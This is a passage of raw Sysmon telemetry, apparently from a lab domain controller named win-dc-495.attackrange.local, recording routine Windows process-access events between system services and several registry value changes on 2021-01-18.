13:33:59.283{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005d8) 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.283{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.268{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.205{59A5CD1D-8E47-6005-1F00-00000000A301}23002320C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.205{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.205{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1F00-00000000A301}2300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-01-18 13:33:59.189 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.158{59A5CD1D-8E47-6005-1C00-00000000A301}21642280C:\Windows\system32\conhost.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.158{59A5CD1D-8E47-6005-1A00-00000000A301}21482276C:\Windows\system32\conhost.exe{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.127{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.127{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.111{59A5CD1D-8E46-6005-1100-00000000A301}1172644C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.096{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.096{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:59.096{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.049{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.049{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E47-6005-1A00-00000000A301}2148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.033{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.033{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 